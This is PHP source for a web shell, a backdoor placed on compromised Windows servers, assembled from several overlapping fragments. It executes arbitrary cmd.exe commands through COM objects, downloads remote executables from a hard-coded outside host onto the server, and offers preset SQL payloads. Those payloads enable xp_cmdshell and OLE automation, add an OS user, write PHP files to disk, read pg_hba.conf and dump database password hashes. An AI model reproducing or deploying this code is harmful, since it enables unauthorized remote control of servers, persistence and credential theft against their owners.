function Com_h() { $object = isset($_GET['o']) ? $_GET['o'] : 'adodb'; print <<<END <div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> <a href="?s=h&o=wscript">[WScript.shell]</a> <a href="?s=h&o=application">[Shell.Application]</a> <a href="?s=h&o=downloader">[Downloader]</a></div> <form method="POST" name="hform" id="hform" action="?s=h&o={$object}"> END; if ($object == 'downloader') { $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe'; $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__) . '/a.exe'); print <<<END <div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div> <div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div> <div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form> END; if (!empty($_POST['durl']) && !empty($_POST['dpath'])) { echo '<div class="actall">'; $contents = @file_get_contents($_POST['durl']); if (!$contents) { echo '无法下载数据'; } else { echo File_Write($_POST['dpath'], $contents, 'wb') ? '下载成功' : '下载失败'; } echo '</div>'; } } elseif ($object == 'wscript') { $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir'; print <<<END <div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form> END; if (!empty($_POST['cmd'])) { echo '<div class="actall">'; $shell = new COM('wscript'); $exe = @$shell->exec("cmd.exe /c " . $cmd); $out = $exe->StdOut(); $output = $out->ReadAll(); echo '<pre>' . $output . '</pre>'; @$shell->Release(); $shell = NULL; echo '</div>'; } } elseif ($object == 'application') { $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\boot.ini d:\\a.txt'; print <<<END <div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div> <div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form> END; if (!empty($_POST['run'])) { echo '<div class="actall">'; $shell = new COM('application'); echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? '执行成功' : '执行失败'; @$shell->Release(); $shell = NULL; echo '</div>'; } } elseif ($object == 'adodb') { $string = isset($_POST['string']) ? $_POST['string'] : ''; $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; print <<<END <script language="javascript"> function hFull(i){ \tif(i==0 || i==5) return false; \tStr = new Array(12); \tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb"; \tStr[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**"; \tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**"; \tStr[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;"; \tStr[6] = "SELECT * FROM [TableName] WHERE ID<10"; \tStr[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')"; \tStr[8] = "DELETE FROM [TableName] WHERE ID=1"; \tStr[9] = "UPDATE [TableName] SET USER='******' WHERE ID=1"; \tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; \tStr[11] = "DROP TABLE [TableName]"; \tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; \tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS"; \tif(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];} \treturn true; } </script> <div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;"> <select onchange="return hFull(options[selectedIndex].value)"> <option value="0" selected>--连接示例--</option> <option value="1">Access连接</option> <option value="2">MsSql连接</option> <option value="3">MySql连接</option> <option value="4">Oracle连接</option> <option value="5">--SQL语法--</option> <option value="6">显示数据</option> <option value="7">添加数据</option> <option value="8">删除数据</option> <option value="9">修改数据</option> <option value="10">建数据表</option> <option value="11">删数据表</option> <option value="12">添加字段</option> <option value="13">删除字段</option> </select></div> <div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div> </form> END; if (!empty($string)) { echo '<div class="actall">'; $shell = new COM('adodb'); @$shell->Open($string); $result = @$shell->Execute($sql); $count = $result->Fields->Count(); for ($i = 0; $i < $count; $i++) { $Field[$i] = $result->Fields($i); } echo $result ? $sql . ' 执行成功<br>' : $sql . ' 执行失败<br>'; if (!empty($count)) { while (!$result->EOF) { for ($i = 0; $i < $count; $i++) { echo htmlspecialchars($Field[$i]->value) . '<br>'; } @$result->MoveNext(); } } $shell->Close(); @$shell->Release(); $shell = NULL; echo '</div>'; } } return true; }
p('day:'); makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2)); p('hour:'); makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2)); p('minute:'); makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2)); p('second:'); makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2)); p('</p>'); formfooter(); goback(); } elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if ($program && $parameter) { $shell = new COM('Shell.Application'); $a = $shell->ShellExecute($program, $parameter); m('Program run has ' . (!$a ? 'success' : 'fail')); } !$program && ($program = 'c:\\windows\\system32\\cmd.exe'); !$parameter && ($parameter = '/c net start > ' . SA_ROOT . 'log.txt'); formhead(array('title' => 'Execute Program')); makehide('action', 'shell'); makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1)); p('<p>'); makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter)); makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute')); p('</p>'); formfoot(); } formhead(array('title' => 'Execute Command')); makehide('action', 'shell');
function Com_h() { $object = isset($_GET['o']) ? $_GET['o'] : 'adodb'; $com = array("adodb" => "ADODB.Connection", "wscript" => "WScript.shell", "application" => "Shell.Application"); print <<<END <div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> <a href="?s=h&o=wscript">[WScript.shell]</a> <a href="?s=h&o=application">[Shell.Application]</a></div> <div class="actall" style="height:200px;"> <form method="POST" name="hform" id="hform" action="?s=h&o={$object}"><br> END; $shell = new COM($com[$object]); if ($object == 'wscript') { $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir'; $cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe'; print <<<END  cmdpath:<input type="text" name="cmdpath" value="{$cmdpath}" style="width:600px;"><br> command:<input type="text" name="cmd" value="{$cmd}" style="width:600px;"> <input class="bt" type="submit" value="execute"></form><br> END; if (!empty($_POST['cmd'])) { $exe = @$shell->exec("{$cmdpath} /c " . $cmd); $out = $exe->StdOut(); $output = $out->ReadAll(); echo '<pre>' . $output . '</pre>'; } } elseif ($object == 'application') { $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\windows\\php.ini c:\\php.ini'; print <<<END Path:<br><input type="text" name="run" value="{$run}" style="width:600px;"> <br><br>Command argv:<br><input type="text" name="cmd" value="{$cmd}" style="width:600px;"> <br><br><input class="bt" type="submit" value="execute"></form><br> END; if (!empty($_POST['run'])) { echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? 'Done' : 'Faild'; } } elseif ($object == 'adodb') { $string = isset($_POST['string']) ? $_POST['string'] : ''; $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; print <<<END <script language="javascript"> function hFull(i){ \tif(i==0 || i==10) return false; \tStr = new Array(12); \tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb;Jet OLEDB:Database Password=***"; \tStr[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa"; \tStr[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root"; \tStr[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;"; Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass"; Str[6] = "DRIVER={POSTGRESQL};SERVER=127.0.0.1;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;"; Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword"; \tStr[8] = "DSN=mydns;Uid=username;Pwd=password"; Str[9] = "FILEDNS=c:\\\\path\\\\db.dsn;Uid=username;Pwd=password"; Str[11] = "SELECT * FROM [TableName] WHERE ID<100"; \tStr[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')"; \tStr[13] = "UPDATE [TableName] SET USER='******' WHERE ID=100"; \tStr[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; \tStr[15] = "DROP TABLE [TableName]"; \tStr[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; Str[17] = "select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r abc123 /add');"; Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"; Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"; Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;"; Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')"; Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')"; Str[23] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '<?php phpinfo();?>' > c:\\info.php';"; \tStr[24] = "sp_makewebtask @outputfile='d:\\\\web\\\test.php',@charset=gb2312,@query='select test';"; Str[25] = "Exec master.dbo.xp_cmdshell 'ver';"; Str[26] = "Select Name FROM Master..SysDatabases;"; Str[27] = "select name from sysobjects where type='U';"; Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');"; Str[29] = "select username,password from dba_users;"; Str[30] = "select TABLE_NAME from all_tables;"; Str[31] = "desc admin;"; Str[32] = "grant connect,resource,dba to user_name;"; Str[33] = "select datname from pg_database;"; Str[34] = "select relname from pg_stat_user_tables;"; Str[35] = "\\\\d table_name"; Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));"; Str[37] = "\\\\! uname -a"; Str[38] = "select schemaname from syscat.schemata;"; Str[39] = "select name from sysibm.systables;"; Str[40] = "select colname from syscat.columns where tabname='table_name';"; Str[41] = "db2 get db cfg for db_name;"; Str[42] = "select name from sysdatabases;"; Str[43] = "select tabname from systables where tabid=n;"; Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;"; Str[45] = "select username,usertype,password from sysusers;"; if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];} \treturn true; } </script> conn strings:<br> <input type="text" name="string" id="string" value="{$string}" style="width:800px;"> <select onchange="return hFull(options[selectedIndex].value)"> <option value="0" selected>--select range--</option> <option value="1">Access</option> <option value="2">MsSql</option> <option value="3">MySql</option> <option value="4">Oracle</option> <option value="5">DB2</option> <option value="6">PostGreSQL</option> <option value="7">Informix</option> <option value="8">DSN</option> <option value="9">FILEDSN</option> <option value="10">--sql statement--</option> <option value="11">show data</option> <option value="12">insert data</option> <option value="13">update data</option> <option value="14">create table</option> <option value="15">drop table</option> <option value="16">add column</option> <option value="17">access shell()</option> <option value="18">add xp_cmdsehll(sql2005)</option> <option value="19">add oacreate(sql2005)</option> <option value="20">add openrowset(sql2005)</option> <option value="21">add xp_cmdsehll(sql2000)</option> <option value="22">add oacreate(sql2000)</option> <option value="23">oamethod exec</option> <option value="24">sp_makewebtask</option> <option value="25">xp_cmdshell</option> <option value="26">databases(sql)</option> <option value="27">tables(sql)</option> <option value="28">columns(sql)</option> <option value="29">hashes(oracle)</option> <option value="30">tables(oracle)</option> <option value="31">columns(oracle)</option> <option value="32">grant(oracle)</option> <option value="33">databases(pgsql)</option> <option value="34">tables(pgsql)</option> <option value="35">columns(pgsql)</option> <option value="36">pg_hba.conf(pgsql)</option> <option value="37">os-command(pgsql)</option> <option value="38">databases(db2)</option> <option value="39">tables(db2)</option> <option value="40">columns(db2)</option> <option value="41">db config(db2)</option> <option value="42">databases(informix)</option> <option value="43">tables(informix)</option> <option value="44">columns(informix)</option> <option value="45">hashes(informix)</option> </select> <br><br>SQL Commnad:<br> <input type="text" name="sql" id="sql" value="{$sql}" style="width:800px;"> <input class="bt" type="submit" value="execute"> </form><br> END; if (!empty($string)) { @$shell->Open($string); $result = @$shell->Execute($sql); $count = $result->Fields->Count(); for ($i = 0; $i < $count; $i++) { $Field[$i] = $result->Fields($i); } echo $result ? $sql . ' Done<br>' : $sql . ' Faild<br>'; if (!empty($count)) { while (!$result->EOF) { for ($i = 0; $i < $count; $i++) { echo $Field[$i]->value . '<br>'; } @$result->MoveNext(); } } $shell->Close(); } } $shell = NULL; echo '</div>'; return true; }